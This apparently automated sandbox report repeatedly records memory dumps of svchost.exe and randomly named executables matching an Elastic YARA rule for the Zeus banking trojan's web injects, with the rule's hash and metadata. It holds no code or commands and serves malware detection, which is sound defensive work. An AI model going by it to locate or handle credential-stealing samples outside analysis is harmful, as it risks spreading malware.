Source: 30.2.nFjEHtbDTFjy.exe.20d2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.888400.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 26.2.nFjEHtbDTFjy.exe.20f2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.37.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.36.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 28.2.nFjEHtbDTFjy.exe.29a2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.17.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.16.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2ab0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.13.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 16.2.nFjEHtbDTFjy.exe.2ba0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.OjKmJJm2YT.exe.840698.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.34.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 34.2.nFjEHtbDTFjy.exe.2d82000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 11.2.nFjEHtbDTFjy.exe.2d92000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.32.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.27.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.OjKmJJm2YT.exe.407000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 7.2.nFjEHtbDTFjy.exe.2be2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.35.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 26.2.nFjEHtbDTFjy.exe.2490000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 11.2.nFjEHtbDTFjy.exe.2ef0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.889000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 34.2.nFjEHtbDTFjy.exe.2f20000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.33.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 36.2.nFjEHtbDTFjy.exe.28f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.31.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.37.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.30.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.14.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.OjKmJJm2YT.exe.406400.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.26.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 5.2.nFjEHtbDTFjy.exe.690000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 26.2.nFjEHtbDTFjy.exe.2490000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 16.2.nFjEHtbDTFjy.exe.29f2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.OjKmJJm2YT.exe.407000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.30.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.29.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1740729143.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
